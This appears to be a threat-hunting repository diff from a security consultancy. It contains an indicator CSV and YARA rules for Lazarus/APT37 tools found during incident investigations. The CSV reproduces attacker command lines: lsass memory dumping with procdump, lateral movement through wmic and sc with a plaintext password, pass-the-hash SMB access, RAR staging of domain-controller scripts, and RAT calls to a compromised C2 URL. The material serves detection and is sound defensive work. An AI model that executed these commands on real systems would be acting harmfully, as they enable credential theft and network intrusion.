14 13 BoeingPDF.exe Dropper 5618b70e7ddc1064282fc90b93fe6c34 E:\BoeingPDF.exe
15 14 BoeingPDF.iso Dropper iso container
16 15 c:\RECYCLER\~DF011.DAT Encrypted Mimikatz BLOB 631da819149e4fee25b06e1da377382c 643041e60643d735054a28199ed30f96be58d445 179c77f392f804a5266b36205d043ee7fc6b0273a6c31f8590960df505f6ad0c
17 16 C:\ProgramData\UniqueId\~DF234.TMP Executable for exfiltration 254a7a0c1db2bea788ca826f4b5bf51a C:\ProgramData\IBM\~DF234.TMP S0RMM-50QQE-F65DN-DCPYN-5QEQA https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp C:\ProgramData\IBM\restore002.dat data05 10000 -p 192.168.1.240 8080
18 17 C:\ProgramData\IBM\IBM122.DAT Loader for encrypted Mimikatz variant 6f7b837ee3cb27712ec13751d4c8a7f5 C:\ProgramData\IBM\IBM122.DAT C:\ProgramData\IBM\IBM121.DAT Z17FDaciCdAbXrRe Y0hKcGRtbHNaV2RsT2pwa1pXSjFaeXh6Wld0MWNteHpZVG82Ykc5bmIyNXdZWE56ZDI5eVpITT0=
19 18 c:\RECYCLER\~DF012.TMP Loader for encrypted Mimikatz variant 82968937f1846b7e8cd94dde420fd5f1 3a4dcfe286693ca435d3408fe813b53671bf1286 42e4a9aeff3744bbbc0e82fd5b93eb9b078460d8f40e0b61b27b699882f521be ~DF012.TMP -f c:\RECYCLER\~DF011.TXT c:\RECYCLER\~DF011.DAT 1q2w3e4r@#$@#$@#$
20 19 C:\solr\~DF010.TMP Loader for encrypted Mimikatz variant cmd.exe /c "wmic /NODE:192.168.1.84 /USER:<DOMAIN>\<USER> /PASSWORD:<PASSWORD PROCESS CALL CREATE "c:\solr\~DF010.TMP -f c:\solr\~DF011.TXT c:\solr\~DF011.TMP 1q2w3e4r@#$@#$@#$" > C:\Users\<USER>\AppData\Local\Temp\~DF8E8D.tmp" 2>&1
21 20 C:\ProgramData\gom\gom_3d.dat lsass.exe process memory
22 21 BAE_FMV_SOF.docx Malicious phishing document bd0c929701308c84e67479adb719367c 533b08aa5225084066df648a30ca107daa66a941 08a75ad3195d4e389786d338519913bbd86fb8112c2cf5c729297387207ce6e7
23 22 Boeing_Defense_PM.docx Malicious phishing document
24 23 Boeing_GS.docx Malicious phishing document
25 24 Boeing_Spectrolab.docx Malicious phishing document
26 25 C:\ProgramData\IBM\SearchProtocol.exe MS17-010 exploit f09d9c7783adb4a44d48c77e412319e1c9cd4384 C:\ProgramData\IBM\SearchProtocol.exe C:\ProgramData\IBM\SearchProtocol.cache HC7k08UOgflouO8i 192.168.1.17 C:\ProgramData\IBM\SearchProtocols.dmp C:\ProgramData\IBM\SearchProtocols.mdmp
27 26 %TEMP%\CMP3894.tmp Output
28 27 %TEMP%\CMPC42B.tmp Output 453654d6f43ff6bc4ea51d7a706b1c53 C:\ProgramData\Intel\DAL\~TMP123.DAT H:\ 0 C:\Users\<USER>\AppData\Local\Temp\CMPC42B.tmp (Directory listing of drive)
29 28 %TEMP%\TMP37F7.tmp Output
30 29 %TEMP%\TMPC40A.tmp Output
31 30 C:\Windows\system32\Drivers\pssdk-proto.sys Packet Sniffer service DLL 37ee8c694dadbc2f38a1d27b4bca0f8d ebfe815b75d5ece5d595042d73ba331658af0d98 8a3998c88c64ec6009247cb9901f1baec181558299521b2f367883cbebae0ba4
32 31 %LOCALAPPDATA%\VirtualStore\ProgramData\ssh\putty.io Persistence DLL c:\windows\system32\rundll32.exe c:\programdata\ssh\putty.io, ProjectView DJiMKWMV2cicZyoW
33 32 C:\ProgramData\~DF565.TMP Persistence DLL 657127b2bdb10dcce9a6fa693abdf5a8
34 33 C:\ProgramData\comms.io Persistence DLL
35 34 C:\ProgramData\Comms\comms.io Persistence DLL 5dea069f7bcee467ca20145ceecc5378
36 35 C:\ProgramData\desktop.ini Persistence DLL 4f3556b6d9c884c696a5a929d450cf2d c:\windows\system32\rundll32.exe C:\ProgramData\desktop.ini,json_object_get_unicode_string 3XXKiU6J0QfZPHdH9SA5nZa3GpIqvgK7
37 36 C:\ProgramData\Git\GitClone.db Persistence DLL c:\windows\system32\rundll32.exe c:\programdata\Git\GitClone.db, ProjectView DJiMKWMV2cicZyoW
38 37 C:\ProgramData\Intel\cache.io Persistence DLL
39 38 C:\ProgramData\Microsoft\MSSqlite3DB.evt.pol.dat Persistence DLL B10C3FB3D826049E04C246D86C552200926086CB rundll32.exe C:\ProgramData\Microsoft\MSSqlite3DB.evt.pol.dat,sqlite3_create_functionex NujsFYJNTpws664RGNruaKSu12TdGVYt
40 39 C:\ProgramData\ThumbNail\thumbnail.db Persistence DLL c:\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db", CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 900 1
41 40 C:\ProgramData\Windows\ntuser.dat Persistence DLL C:\windows\system32\rundll32.exe C:\ProgramData\Windows\ntuser.dat,CMS_ContentInfo {216B0291-15BF-D688-1700-4CFEE40B5330}
42 41 C:\Users\Public\FontCache.dat Persistence DLL 3358c93ca892f145d303a005262d7a3d C:\Windows\System32\rundll32.exe C:\Users\Public\FontCache.dat,ilBindComponent WLFNjCysJmJZD22En4fKd3fTfRqXASqK
43 42 %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\GitClone.lnk Persistence LNK
44 43 %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NavCache.lnk Persistence LNK for C:\ProgramData\Intel\cache.io
45 44 %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\MSPolicy.lnk Persistence LNK for C:\ProgramData\Microsoft\MSSqlite3DB.evt.pol.dat
46 45 %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneNote.lnk Persistence LNK for C:\Users\Public\FontCache.dat
47 46 C:\ProgramData\ntusers.pool Persitence DLL 1256b1f01c08ad10bb36c6b4ca0b2a00 C:\Windows\System32\rundll32.exe C:\ProgramData\ntusers.pool,ilBindComponent nVhIq5ifeTQiuOhmQC51dK1DEnyUWk7h
48 47 C:\ProgramData\IBM\igfxmnr.exe RAR 4c2a76ceee9becfeffe78265166182ba c70b71f7aa367d88c6ec5942269a45cbc66510b3 ea139458b4e88736a3d48e81569178fd5c11156990b6a90e2d35f41b1ad9bac1 C:\ProgramData\IBM\igfxmnr.exe a -hp1q2w3e4 -m5 "C:\ProgramData\IBM\restore01.dat" "C:\ProgramData\IBM\IBM010J.DAT" C:\ProgramData\IBM\igfxmnr.exe a -hp1q2w3e4 -m5 "C:\ProgramData\IBM\restore06.dat" "\\<DOMAINCONTROLLER>\SYSVOL\<FQDN>\scripts\"
49 48 C:\ProgramData\Intel\DAL\igfxmnr.exe RAR 4c2a76ceee9becfeffe78265166182ba c70b71f7aa367d88c6ec5942269a45cbc66510b3 ea139458b4e88736a3d48e81569178fd5c11156990b6a90e2d35f41b1ad9bac1
50 49 C:\ProgramData\Wagent.exe RAR 070d15cd95c14784606ecaa88657551e 2ca084a8cb5b3b7869d019a01e13882782521a07 cf0121cd61990fd3f436bda2b2aff035a2621797d12fd02190ee0f9b2b52a75d
51 50 C:\ProgramData\IBM\~df099.dat RAT component
52 51 C:\ProgramData\Intel\DAL\~TMP015.DAT RAT component 1b1afed4d2107648fa959bb738e25350 cmd.exe /c "sc \\<HOSTNAME> create rpcmgr binPath= "cmd.exe /c c:\ProgramData\Intel\DAL\~TMP015.DAT -p 0x57AC098B" > C:\Users\<USER>\AppData\Local\Temp\~DFE3B6.tmp" 2>&1
53 52 C:\ProgramData\Intel\DAL\~TMP123.DAT RAT component C:\ProgramData\Intel\DAL\~TMP123.DAT -p 0x57AC098B POST http://www.hirokawaunso.co.jp/wordpress/wp-includes/review.php?no=23485&unm=9986812&rtss=100&query=basic
54 53 C:\ProgramData\Microsoft\DeviceSync\DeviceCaches.DMP RAT component cmd.exe /c C:\ProgramData\Microsoft\DeviceSync\DeviceCaches.DMP -p 0x53A4C60B  
55 54 C:\ProgramData\ntuser.io RAT component ab252b14053c7c13ecc668773fa26ee5 08875e26ca1a5e089590f6e9b681f328cc484a1a899dd07caa6fc4e738e6cfbc cmd.exe /c C:\ProgramData\RAgent.exe OneDrive-USOPriv
56 55 C:\ProgramData\ssh\ssh_tmp088.tmp RAT component aa85312c372738e889847608798b3b1a cmd.exe /c "sc \\<HOSTNAME> create RPCMGR binPath= "cmd.exe /c c:\ProgramData\ssh\ssh_tmp088.tmp -p 0x57AC098B" > C:\Users\<USER>\AppData\Local\Temp\~DF693C.tmp" 2>&1
57 56 C:\ProgramData\USOShared\USO.TMP RAT component 657127b2bdb10dcce9a6fa693abdf5a8 C:\ProgramData\USOShared\USO.TMP -p 0x57AC098B cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v USOShare /t REG_SZ /d "C:\ProgramData\USOShared\USO.TMP -p 0x57AC098B" > C:\Windows\TEMP\~DF16D1.tmp" 2>&1
58 57 C:\RECYCLER\~TMP.0312.bin RAT component cmd.exe /c "sc \\192.168.1.17 create RPCMGR binPath= "cmd.exe /c c:\RECYCLER\~TMP.0312.bin -p 0x57AC098B" > C:\Users\<USER>\AppData\Local\Temp\~DFBF01.tmp" 2>&1 cmd.exe /c "wmic /NODE:192.168.1.17 /USER:workgroup\tempAdmins /PASSWORD:1q2w3e4r5t!@#$ PROCESS CALL CREATE "c:\RECYCLER\~TMP.0312.bin -p 0x57AC098B" > C:\Users\<USER>\AppData\Local\Temp\~DF8CA9.tmp" 2>&1
59 58 C:\users\public\~df098.tmp RAT component cmd.exe /c "sc \\<HOSTNAME> create RPCMGR binPath= "cmd.exe /c c:\ProgramData\Veeam\~DF098.TMP -p 0x57AC098B" > C:\Users\<USER>\AppData\Local\Temp\~DFEF26.tmp" 2>&1 cmd.exe /c "sc \\<HOSTNAME> create RPCMGR binPath= "cmd.exe /c taskkill /im ~DF098.TMP /f" > C:\Users\<USER>\AppData\Local\Temp\~DFC309.tmp" 2>&1
60 59 chromeviewer.exe RAT component 78df38b31b2c944e42a9a934ee206940
61 60 C:\Windows\sam.txt SAM dump
62 61 C:\ProgramData\IBM\IBM011.BIN SMB scanner IBM011.BIN 192.168.1.1 192.168.1.255 10 C:\ProgramData\IBM\IBM011RMU.DAT workgroup\Administrator password 1
63 62 C:\ProgramData\Cisco\CAGT.EXE SMBMAP 6b69acebbdd63c3010c752e8321c13e0 C:\ProgramData\Cisco\cagt.exe -u <USER> -d <DOMAIN> -p aad3b435b51404eeaad3b435b51404ee:<NTHASH> -H 192.168.1.134 -r C$\ProgramData
64 63 C:\ProgramData\gom\gom_3d.exe SysInternals procdump be046bab4a23f8db568535aaea565f87 C:\ProgramData\gom\gom_3d.exe -accepteula -ma lsass -o c:\ProgramData\gom\gom_3d.dat
65 64 %LOCALAPPDATA%\ntuser.log1 Unknown
66 65 %TEMP%\~DFFAC3.tmp Unknown
67 66 C:\ProgramData\FreePDF\~df088.dat Unknown
68 67 C:\ProgramData\FreePDF\~df099.dat Unknown
69 68 C:\ProgramData\FreePDF\~df456.dat Unknown
70 69 C:\ProgramData\FreePDF\~df456.tmp Unknown
71 70 C:\ProgramData\FreePDF\~df565.tmp Unknown
72 71 C:\ProgramData\FreePDF\DF033.TMP Unknown
73 72 c:\ProgramData\FreePDF\DF080.TMP Unknown
74 73 C:\ProgramData\FreePDF\DF234.TMP Unknown
75 74 C:\ProgramData\FreePDF\DF343.TMP Unknown
76 75 C:\ProgramData\FreePDF\DF435.TMP Unknown
77 76 c:\ProgramData\FreePDF\DF565.TMP Unknown
78 77 C:\ProgramData\Intel\NavCache.io Unknown
79 78 C:\ProgramData\itp11\cache3_5001238963-ENC.cache Unknown
80 79 C:\ProgramData\itp11\cache3_5001238964-ENC.cache Unknown
81 80 C:\ProgramData\Microsoft\DeviceSync\Deviceinc.db Unknown
82 81 C:\ProgramData\Microsoft\DeviceSync\Devicemdb.db Unknown
83 82 C:\ProgramData\Microsoft\DeviceSync\Devicestg.db Unknown
84 83 C:\ProgramData\Microsoft\DeviceSync\Devicestg.db Unknown
85 84 C:\ProgramData\Microsoft\DeviceSync\DF235.TMP Unknown
86 85 C:\ProgramData\Microsoft\DeviceSync\DF333.TMP Unknown
87 86 C:\ProgramData\Microsoft\DeviceSync\gather.bat Unknown
88 87 C:\ProgramData\USOShared\pkg.db Unknown
89 88 C:\Windows\System32\irmon.dll Unknown
90 89 C:\Windows\System32\srservice.dll Unknown
91 90 C:\Windows\System32\srsvc.dll Unknown
92 91 C:\ProgramData\Cisco\Client.exe Unknown executable f453dd430e160b4c07a9bc9f7c7e7bca
93 92 C:\ProgramData\cookie.dat Unknown executable 92d9e6ccef0e41f5bf47b1a9f213ddbf
94 93 C:\ProgramData\Intel\cache.exe Unknown executable 7ba191c703f24ccb04bfba4a931686f6
95 94 C:\ProgramData\Intel\DAL\~TMP323.DAT Unknown executable 2852022f7a2e360e863cff1793eaa098
96 95 C:\ProgramData\Intel\iCLS.exe Unknown executable 3415c8deefb3e7fb3394d411ebf33292
97 96 C:\ProgramData\Intel\SearchProtocol.bin Unknown executable C:\ProgramData\Intel\SearchProtocol.bin 10128 C:\ProgramData\Intel\gather.bat
98 97 C:\ProgramData\UAgent.exe Unknown executable 648e7cee1afd1d0998cda0b2b8d826ae
99 98 C:\ProgramData\UIU\ui.exe Unknown executable
100 99 C:\ProgramData\USOShared\~DF099.DAT Unknown executable C:\ProgramData\USOShared\~DF099.DAT \\<HOSTNAME>\<SHARE>\<FOLDER> 0 C:\ProgramData\USOShared\<HOSTNAME>.bin
101 100 C:\Users\Public\DF090.TMP Unknown executable sc \\<HOSTNAME> create RPCMGR binPath= "cmd.exe /c c:\ProgramData\Veeam\~DF090.TMP 3 c:\ProgramData\Veeam\ntuser.bat"
102 101 C:\Windows\System32\pchsvc.dll Unknown service DLL cmd.exe /c dir /a pchsvc.dll cmd.exe /c "del \\<HOSTNAME>\c$\windows\system32\pchsvc.dll > C:\Users\<USER>\AppData\Local\Temp\~DFD584.tmp" 2>&1
103 102 GD1029581823.docx Malicious phishing document 9524af8a52cb7edc52838dcc95d00b81 9e3672862bf00791bc01d0bbf7209edee3d7d3b6 f12f87d56e9291ddea6f5db23b9f6066dbeb52ff06e14640e5a36418b5a9ea02
104 103 InternalPDFViewer.exe RipplePDF viewer with unknown Hash 97724b3c86ebd723112eee4ec2c56e04 a44736d896c670fd0bf72c7535da7bdb0d00e9ba 36bd69a0bd334ea28b7c53091425421bf78f79e6007133a46c7c597bc660d9c8

@ -0,0 +1,210 @@
import "pe"
rule HvS_APT37_smb_scanner {
meta:
description = "Unknown smb login scanner used by APT37"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Marc Stroebel"
date = "2020-12-15"
reference1 = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
reference2 = "https://www.hybrid-analysis.com/sample/d16163526242508d6961f061aaffe3ae5321bd64d8ceb6b2788f1570757595fc?environmentId=2"
strings:
$s1 = "Scan.exe StartIP EndIP ThreadCount logfilePath [Username Password Deep]" fullword ascii
$s2 = "%s - %s:(Username - %s / Password - %s" fullword ascii
$s3 = "Load mpr.dll Error " fullword ascii
$s4 = "Load Netapi32.dll Error " fullword ascii
$s5 = "%s U/P not Correct! - %d" fullword ascii
$s6 = "GetNetWorkInfo Version 1.0" fullword wide
$s7 = "Hello World!" fullword wide
$s8 = "%s Error: %ld" fullword ascii
$s9 = "%s U/P Correct!" fullword ascii
$s10 = "%s --------" fullword ascii
$s11 = "%s%-30s%I64d" fullword ascii
$s12 = "%s%-30s(DIR)" fullword ascii
$s13 = "%04d-%02d-%02d %02d:%02d" fullword ascii
$s14 = "Share: Local Path: Uses: Descriptor:" fullword ascii
$s15 = "Share: Type: Remark:" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 200KB and (10 of them)
}
rule HvS_APT37_cred_tool {
meta:
description = "Unknown cred tool used by APT37"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Markus Poelloth"
date = "2020-12-15"
reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
strings:
$s1 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>" fullword ascii
$s2 = "Domain Login" fullword ascii
$s3 = "IEShims_GetOriginatingThreadContext" fullword ascii
$s4 = " Type Descriptor'" fullword ascii
$s5 = "User: %s" fullword ascii
$s6 = "Pass: %s" fullword ascii
$s7 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
$s8 = "E@c:\\u" fullword ascii
condition:
filesize < 500KB and 7 of them
}
rule HvS_APT37_RAT_loader {
meta:
description = "BLINDINGCAN RAT loader named iconcash.db used by APT37"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Marc Stroebel"
date = "2020-12-15"
hash = "b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9"
reference1 = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
reference2 = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a"
condition:
(pe.version_info["OriginalFilename"] contains "MFC_DLL.dll") and
(pe.exports("SMain") and pe.exports("SMainW") )
}
rule HvS_APT37_webshell_img_thumbs_asp {
meta:
description = "Webshell named img.asp, thumbs.asp or thumb.asp used by APT37"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Moritz Oettle"
date = "2020-12-15"
reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
hash = "94d2448d3794ae3f29678a7337473d259b5cfd1c7f703fe53ee6c84dd10a48ef"
strings:
$s1 = "strMsg = \"E : F\"" fullword ascii
$s2 = "strMsg = \"S : \" & Len(fileData)" fullword ascii
$s3 = "Left(workDir, InStrRev(workDir, \"/\")) & \"video\""
$a1 = "Server.CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
$a2 = "Dim tmpPath, workDir" fullword ascii
$a3 = "Dim objFSO, objTextStream" fullword ascii
$a4 = "workDir = Request.ServerVariables(\"URL\")" fullword ascii
$a5 = "InStrRev(workDir, \"/\")" ascii
$g1 = "WriteFile = 0" fullword ascii
$g2 = "fileData = Request.Form(\"fp\")" fullword ascii
$g3 = "fileName = Request.Form(\"fr\")" fullword ascii
$g4 = "Err.Clear()" fullword ascii
$g5 = "Option Explicit" fullword ascii
condition:
filesize < 2KB and (( 1 of ($s*) ) or (3 of ($a*)) or (5 of ($g*)))
}
rule HvS_APT37_webshell_template_query_asp {
meta:
description = "Webshell named template-query.aspimg.asp used by APT37"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Moritz Oettle"
date = "2020-12-15"
reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
hash = "961a66d01c86fa5982e0538215b17fb9fae2991331dfea812b8c031e2ceb0d90"
strings:
$g1 = "server.scripttimeout=600" fullword ascii
$g2 = "response.buffer=true" fullword ascii
$g3 = "response.expires=-1" fullword ascii
$g4 = "session.timeout=600" fullword ascii
$a1 = "redhat hacker" ascii
$a2 = "want_pre.asp" ascii
$a3 = "vgo=\"admin\"" ascii
$a4 = "ywc=false" ascii
$s1 = "public br,ygv,gbc,ydo,yka,wzd,sod,vmd" fullword ascii
condition:
filesize > 70KB and filesize < 200KB and (( 1 of ($s*) ) or (2 of ($a*)) or (3 of ($g*)))
}
rule HvS_APT37_mimikatz_loader_DF012 {
meta:
description = "Loader for encrypted Mimikatz variant used by APT37"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Marc Stroebel"
date = "2020-12-15"
reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
hash = "42e4a9aeff3744bbbc0e82fd5b93eb9b078460d8f40e0b61b27b699882f521be"
strings:
$s1 = ".?AVCEncryption@@" fullword ascii
$s2 = "afrfa"
condition:
uint16(0) == 0x5a4d and filesize < 200KB and
(pe.imphash() == "fa0b87c7e07d21001355caf7b5027219") and (all of them)
}
rule HvS_APT37_webshell_controllers_asp {
meta:
description = "Webshell named controllers.asp or inc-basket-offer.asp used by APT37"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Moritz Oettle"
date = "2020-12-15"
reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
hash = "829462fc6d84aae04a962dfc919d0a392265fbf255eab399980d2b021e385517"
strings:
$s0 = "<%@Language=VBScript.Encode" ascii
// Case permutations of the word SeRvEr encoded with the Microsoft Script Encoder followed by “.scriptrimeOut”
$x1 = { 64 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x2 = { 64 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x3 = { 64 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x4 = { 64 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x5 = { 64 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x6 = { 64 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x7 = { 64 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x8 = { 64 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x9 = { 64 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x10 = { 64 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x11 = { 64 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x12 = { 64 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x13 = { 64 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x14 = { 64 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x15 = { 64 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x16 = { 64 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x17 = { 64 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x18 = { 64 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x19 = { 64 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x20 = { 64 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x21 = { 64 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x22 = { 64 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x23 = { 64 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x24 = { 64 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x25 = { 64 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x26 = { 6A 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x27 = { 6A 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x28 = { 6A 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x29 = { 6A 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x30 = { 6A 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x31 = { 6A 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x32 = { 6A 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x33 = { 6A 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x34 = { 64 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x35 = { 6A 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x36 = { 6A 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x37 = { 6A 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x38 = { 6A 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x39 = { 6A 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x40 = { 6A 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x41 = { 6A 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x42 = { 6A 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x43 = { 6A 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x44 = { 6A 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x45 = { 64 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x46 = { 6A 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x47 = { 6A 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x48 = { 6A 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x49 = { 6A 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x50 = { 6A 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x51 = { 6A 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x52 = { 6A 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x53 = { 6A 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x54 = { 6A 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x55 = { 6A 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x56 = { 64 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x57 = { 6A 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x58 = { 6A 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x59 = { 6A 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x60 = { 6A 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x61 = { 64 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x62 = { 64 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x63 = { 64 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
$x64 = { 64 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
condition:
filesize > 50KB and filesize < 200KB and ( $s0 and 1 of ($x*) )
}

@ -0,0 +1,15 @@
# Lazarus / APT37 IOCs
- Version 1.0
- Date: 15.12.2020
- Author: HvS-Consulting AG
## Context
- We used those IOCs in recent investigations to search for traces of 2020s Lazarus / APT37 campaigns.
- More context and matching TTPs can be found in our report: https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf
## Notes & Disclaimer
- Most of the given C2 Domains are legit websites, which were hacked and abused by the Lazarus group. If you observe traffic to these domains in your organization, it might also be legit use of these websites. In our report more details about the functionality of the C2 communication are shared, which helps by identifying malicious traffic.
- We provided hashes for many samples, but please note that especially the hashes were changed by the attacker to be different on each system.
- Even if we try to avoid false positives by manual QA, those rules are not meant to be used in production without previous dry runs.

@ -0,0 +1,34 @@
# HvS IOC Signatures
## Purpose
Since HvS-Consulting is handling incidents for multiple years now, we collect sets of IOCs - mainly YARA rules - on a regular basis. Occasionally also sets are created by our team due to internal research. In order to help the community with **Threat Hunting** and **Incident Response**, we would like to share selected sets of IOCs from time to time in this repository. These IOCs have great value for threat hunting or the improvement of security monitoring within organizations.
Even if we try to avoid false positives by manual QA, those rules are not meant to be used in production without previous dry runs.
## Structure
As we focus on hunting and specific threat actors, we decided to create a directory per actor, containing various common IOC types like:
- YARA Rules* to find indicators in files, registry entries, event log messages, process memory, ...
- CSV files with indicators including some context which should increase actionability in case of matches
- Lists e.g. of malicious IPs and Domains
\* Some rules might require [THORs](https://www.nextron-systems.com/thor/) or [LOKIs](https://github.com/Neo23x0/Loki) extensions of YARA to be fully supported.
## FAQ
### Is there a scheduled update interval of IOCs
No we release new IOCs only occasionally.
### How should false positives be reported?
You can just use the issues section of this repository.
### I want to know more about HvS-Consulting AG
